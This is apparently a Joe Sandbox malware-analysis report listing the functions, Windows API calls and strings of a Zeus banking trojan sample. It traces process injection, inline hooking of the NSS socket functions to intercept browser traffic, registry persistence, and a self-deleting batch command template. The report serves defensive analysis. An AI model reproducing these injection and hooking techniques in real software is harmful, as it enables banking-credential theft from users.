Sleep.KERNEL32(000000FF,?,00000001), ref: 0041312B
ExitProcess.KERNEL32(00000000,00000000), ref: 0041313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00413157

Part of subcall function 00412542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00412574
Part of subcall function 00412542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125AB
Part of subcall function 00412542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0041316D,?,00000000,?,?,00000000), ref: 004125CB
Part of subcall function 00412542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0041316D,?,00000000), ref: 0041261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00835903,00000000,00000000,00000000), ref: 00413185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00413198
CloseHandle.KERNEL32(?), ref: 004131A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 004131B5
CloseHandle.KERNEL32(00000000), ref: 004131BC

Strings

h(B, xrefs: 00413103

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C1F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(003D3FB4,00000000,76C61857,00000000), ref: 003C1FAF
InitializeCriticalSection.KERNEL32(003D2AC8), ref: 003C1FE4

Part of subcall function 003C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 003C28A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 003C2029
CloseHandle.KERNEL32(00000000), ref: 003C203A

Part of subcall function 003C9D6D: InitializeCriticalSection.KERNEL32(003D3F24,00000000,7718F8FF), ref: 003C9D8F
Part of subcall function 003C9D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 003C9E63

Part of subcall function 003CB4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 003CB4F0

InitializeCriticalSection.KERNEL32(003D23AC), ref: 003C2081

Part of subcall function 003BE0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 003BE108
Part of subcall function 003BE0FB: GetThreadDesktop.USER32(00000000), ref: 003BE10F
Part of subcall function 003BE0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 003BE128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 003C2093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 003C209E

Part of subcall function 003BC103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,003C20A9), ref: 003BC111
Part of subcall function 003BC103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,003C20A9), ref: 003BC125
Part of subcall function 003BC103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 003BC132
Part of subcall function 003BC103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 003BC13F
Part of subcall function 003BC103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 003BC14C

Strings

nss3.dll, xrefs: 003C2099
nspr4.dll, xrefs: 003C208E

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004178D5, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60

APIs

RegCreateKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,0041CA1A,00000000,00000000,C:\Users\admin\AppData\Roaming,?,C:\Users\admin\AppData\Roaming,0041CA1A,C:\Users\admin\AppData\Roaming,00000000), ref: 004178FD

Part of subcall function 0041773A: CharUpperW.USER32(00000000), ref: 0041785B

RegCreateKeyExW.KERNEL32(0041CA1A,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?,0041CA1A,?,C:\Users\admin\AppData\Roaming,0041CA1A,C:\Users\admin\AppData\Roaming), ref: 0041792F
RegCloseKey.KERNEL32(?,?,C:\Users\admin\AppData\Roaming,0041CA1A,C:\Users\admin\AppData\Roaming,00000000), ref: 00417938
RegCloseKey.KERNEL32(0041CA1A,?,C:\Users\admin\AppData\Roaming,0041CA1A), ref: 00417952

Strings

SOFTWARE\Microsoft, xrefs: 004178F0
d, xrefs: 00417943
C:\Users\admin\AppData\Roaming, xrefs: 004178DB

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004169AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(00422C3C,00000001,00000000,004122ED,?,?,00000000), ref: 004169B4
SetSecurityDescriptorDacl.ADVAPI32(00422C3C,00000001,00000000,00000000,?,?,00000000), ref: 004169C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 004169DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 004169F7
SetSecurityDescriptorSacl.ADVAPI32(00422C3C,?,?,?,?,?,00000000), ref: 00416A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00416A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 004169D6

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C7BF7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108

APIs

Part of subcall function 003C7BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,003BC168,DB84D88A,?,?,?,003BBD76,00000000,00000000,00000004,?,?,003BC160), ref: 003C7BC7

VirtualProtectEx.KERNELBASE(000000FF,003BC160,0000001E,00000040,`#=,003BC158,00000004,?,?,?,?,003BBE97,6A003D23,00000000), ref: 003C7C24
ReadProcessMemory.KERNELBASE(000000FF,003BC160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,003BBE97,6A003D23,00000000), ref: 003C7C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 003C7CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 003C7CED
VirtualProtectEx.KERNELBASE(000000FF,?,0000001E,`#=,`#=,?,?,?,?,003BBE97,6A003D23,00000000,?,?,003BC160,003D2360), ref: 003C7D05

Strings

`#=, xrefs: 003C7C17, 003C7CF7, 003C7CFB, 003C7C1A, 003C7CFA

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 00418737: GetTempPathW.KERNEL32(000000F6,?), ref: 0041874E

CharToOemW.USER32(?,?), ref: 00414EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414F2F

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Part of subcall function 0041856B: CreateFileW.KERNEL32(00414E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00418585
Part of subcall function 0041856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004185A8
Part of subcall function 0041856B: CloseHandle.KERNEL32(00000000), ref: 004185B5

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Strings

ComSpec, xrefs: 00414F2A
/c "%s", xrefs: 00414F01
@echo off%sdel /F "%s", xrefs: 00414EBE
bat, xrefs: 00414E8B

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B3F
GetLastError.KERNEL32(?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B45

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 00414B8B

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CloseHandle.KERNEL32(?), ref: 00414BB6

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 0041797D
PathAddBackslashW.SHLWAPI(?), ref: 00417994
PathRemoveBackslashW.SHLWAPI(?), ref: 004179A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 004179B2
PathAddBackslashW.SHLWAPI(?), ref: 004179C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 004179D2
CLSIDFromString.OLE32(?,?), ref: 004179EC

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,?,00000000,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414AB0
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00414AD4
AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 00414AE9
GetLastError.KERNEL32 ref: 00414AF3
CloseHandle.KERNEL32(?), ref: 00414B02

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00416A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 00414A87: GetCurrentThread.KERNEL32(00000020,00000000,?,00000000,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414A97
Part of subcall function 00414A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414A9E
Part of subcall function 00414A87: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414AB0
Part of subcall function 00414A87: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00414AD4
Part of subcall function 00414A87: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 00414AE9
Part of subcall function 00414A87: GetLastError.KERNEL32 ref: 00414AF3
Part of subcall function 00414A87: CloseHandle.KERNEL32(?), ref: 00414B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,0041C745,00000000), ref: 00416A5B
GetSecurityDescriptorSacl.ADVAPI32(0041C745,?,?,?,?,?,0041C745,?), ref: 00416A77
SetNamedSecurityInfoW.ADVAPI32(0041C745,00000001,00000010,00000000,00000000,00000000,?), ref: 00416A8E
LocalFree.KERNEL32(0041C745,?,?,0041C745,?), ref: 00416A9D

Strings

SeSecurityPrivilege, xrefs: 00416A43
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00416A56

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004185D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 004185F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00412D27,?,?,00000000), ref: 00418608
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00412D27,?,?,00000000), ref: 00418630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00418648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00412D27,?,?,00000000), ref: 00418662
CloseHandle.KERNEL32(?), ref: 0041866B

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041C6DF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71

APIs

Part of subcall function 0041786B: PathAddExtensionW.SHLWAPI(00000000,00000000), ref: 004178AC
Part of subcall function 0041786B: GetFileAttributesW.KERNEL32(00000000,00000000,00000006,00000000,?,.exe), ref: 004178B9

ResumeThread.KERNELBASE(?,00000000,00000002,?,?,00000000,00000006,00000000,C:\Users\admin\AppData\Roaming), ref: 0041C72A
CloseHandle.KERNEL32(00000000), ref: 0041C787

Part of subcall function 00416A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,0041C745,00000000), ref: 00416A5B
Part of subcall function 00416A3C: GetSecurityDescriptorSacl.ADVAPI32(0041C745,?,?,?,?,?,0041C745,?), ref: 00416A77
Part of subcall function 00416A3C: SetNamedSecurityInfoW.ADVAPI32(0041C745,00000001,00000010,00000000,00000000,00000000,?), ref: 00416A8E
Part of subcall function 00416A3C: LocalFree.KERNEL32(0041C745,?,?,0041C745,?), ref: 00416A9D

Part of subcall function 0041773A: CharUpperW.USER32(00000000), ref: 0041785B

CreateFileW.KERNEL32(0041CA1A,C0000000,00000000,?,00000002,00000080,00000000), ref: 0041C77B

Strings

C:\Users\admin\AppData\Roaming, xrefs: 0041C6E8
.exe, xrefs: 0041C747

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CC49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

GetProcessId.KERNELBASE(?), ref: 003CC509

Part of subcall function 003C245B: CreateMutexW.KERNELBASE(003D2C30,00000001,?,003D2E70,76C605D7,?,00000002,?,76C605D7), ref: 003C24A3
Part of subcall function 003C245B: GetLastError.KERNEL32 ref: 003C24AF
Part of subcall function 003C245B: CloseHandle.KERNEL32(00000000), ref: 003C24BD

Part of subcall function 003C2542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 003C2574
Part of subcall function 003C2542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,003C316D,?,00000000,?,?,00000000), ref: 003C25AB
Part of subcall function 003C2542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,003C316D,?,00000000,?,?,00000000), ref: 003C25CB
Part of subcall function 003C2542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,003C316D,?,00000000), ref: 003C261A

GetThreadContext.KERNEL32 ref: 003CC557
SetThreadContext.KERNEL32(00000000,00000000), ref: 003CC596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 003CC5AD
CloseHandle.KERNEL32(?), ref: 003CC5B7

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041CA1A, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201

APIs

GetFileAttributesW.KERNEL32 ref: 0041CA39

Part of subcall function 0041C6DF: ResumeThread.KERNELBASE(?,00000000,00000002,?,?,00000000,00000006,00000000,C:\Users\admin\AppData\Roaming), ref: 0041C72A
Part of subcall function 0041C6DF: CreateFileW.KERNEL32(0041CA1A,C0000000,00000000,?,00000002,00000080,00000000), ref: 0041C77B
Part of subcall function 0041C6DF: CloseHandle.KERNEL32(00000000), ref: 0041C787

Part of subcall function 004178D5: RegCreateKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,0041CA1A,00000000,00000000,C:\Users\admin\AppData\Roaming,?,C:\Users\admin\AppData\Roaming,0041CA1A,C:\Users\admin\AppData\Roaming,00000000), ref: 004178FD
Part of subcall function 004178D5: RegCreateKeyExW.KERNEL32(0041CA1A,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?,0041CA1A,?,C:\Users\admin\AppData\Roaming,0041CA1A,C:\Users\admin\AppData\Roaming), ref: 0041792F
Part of subcall function 004178D5: RegCloseKey.KERNEL32(?,?,C:\Users\admin\AppData\Roaming,0041CA1A,C:\Users\admin\AppData\Roaming,00000000), ref: 00417938
Part of subcall function 004178D5: RegCloseKey.KERNEL32(0041CA1A,?,C:\Users\admin\AppData\Roaming,0041CA1A), ref: 00417952

Part of subcall function 00412641: GetComputerNameW.KERNEL32(?,?), ref: 0041265C
Part of subcall function 00412641: GetVersionExW.KERNEL32(?,?,00000000,0000011C,000001E6,C:\Users\admin\AppData\Roaming), ref: 00412697
Part of subcall function 00412641: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,?,?,00000000,00000100), ref: 0041270D

Part of subcall function 0041795E: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 0041797D
Part of subcall function 0041795E: PathAddBackslashW.SHLWAPI(?), ref: 00417994
Part of subcall function 0041795E: PathRemoveBackslashW.SHLWAPI(?), ref: 004179A5
Part of subcall function 0041795E: PathRemoveFileSpecW.SHLWAPI(?), ref: 004179B2
Part of subcall function 0041795E: PathAddBackslashW.SHLWAPI(?), ref: 004179C3
Part of subcall function 0041795E: GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 004179D2
Part of subcall function 0041795E: CLSIDFromString.OLE32(?,?), ref: 004179EC

Part of subcall function 00414998: Sleep.KERNELBASE(00000014,00000000,0041CACA,?,00000028,00000001,?,?,?,00000000,000001E6,?,C:\Users\admin\AppData\Roaming,?,00000001,C:\Users\admin\AppData\Roaming), ref: 004149AE

Part of subcall function 0041353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00414232,00000000,00000000,00000000,00413597,00000000,00000000,00000000,?,00000000), ref: 00413555

Part of subcall function 0041773A: CharUpperW.USER32(00000000), ref: 0041785B

lstrcmpiA.KERNEL32(?,?,00000000,00000101,00000002,?,00000000,0000000A,00000000,00000014,00000000,00000014,?,00000028,?,00000028), ref: 0041CB9C

Part of subcall function 0041897D: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,02000000,00000000), ref: 00418995
Part of subcall function 0041897D: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 004189A9
Part of subcall function 0041897D: CloseHandle.KERNEL32(00000000), ref: 004189B5

Part of subcall function 004188BD: PathIsDirectoryW.SHLWAPI(?), ref: 00418940
Part of subcall function 004188BD: PathRemoveFileSpecW.SHLWAPI(?), ref: 00418967

Part of subcall function 004189C2: PathSkipRootW.SHLWAPI(0041CA1A), ref: 004189CD
Part of subcall function 004189C2: GetFileAttributesW.KERNEL32(0041CA1A,?,C:\Users\admin\AppData\Roaming,0041CA4A,C:\Users\admin\AppData\Roaming), ref: 004189F5
Part of subcall function 004189C2: CreateDirectoryW.KERNEL32(0041CA1A,00000000,?,C:\Users\admin\AppData\Roaming,0041CA4A,C:\Users\admin\AppData\Roaming), ref: 00418A03

Strings

C:\Users\admin\AppData\Roaming, xrefs: 0041CA27, 0041CA2B, 0041CA44, 0041CA55, 0041CA72
.exe, xrefs: 0041CA56

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00412641, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122

APIs

GetComputerNameW.KERNEL32(?,?), ref: 0041265C
GetVersionExW.KERNEL32(?,?,00000000,0000011C,000001E6,C:\Users\admin\AppData\Roaming), ref: 00412697

Part of subcall function 00417595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00419E26,?,?), ref: 004175AD

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,?,?,00000000,00000100), ref: 0041270D

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 0041768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,?,00000000,0000011C,?), ref: 004176B3
Part of subcall function 0041768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,?), ref: 004176E2
Part of subcall function 0041768E: RegCloseKey.ADVAPI32(?), ref: 00417702

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00412673

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 003C76B3

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 003C76E2

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

RegCloseKey.ADVAPI32(?), ref: 003C7702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 003C7699

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00411E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00411E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00411E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00411E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00411E3D, 00411E42, 00411E59

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C7D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(003B0000,?), ref: 003C7D30
VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 003C7D4E
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000,003B0000,?,?,00000000,?,00000000), ref: 003C7DE0

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,003B0000,?,?,00000000,?,00000000), ref: 003C7E05

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C2542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 003C7D14: IsBadReadPtr.KERNEL32(003B0000,?), ref: 003C7D30
Part of subcall function 003C7D14: VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 003C7D4E
Part of subcall function 003C7D14: WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000,003B0000,?,?,00000000,?,00000000), ref: 003C7DE0
Part of subcall function 003C7D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,003B0000,?,?,00000000,?,00000000), ref: 003C7E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 003C2574
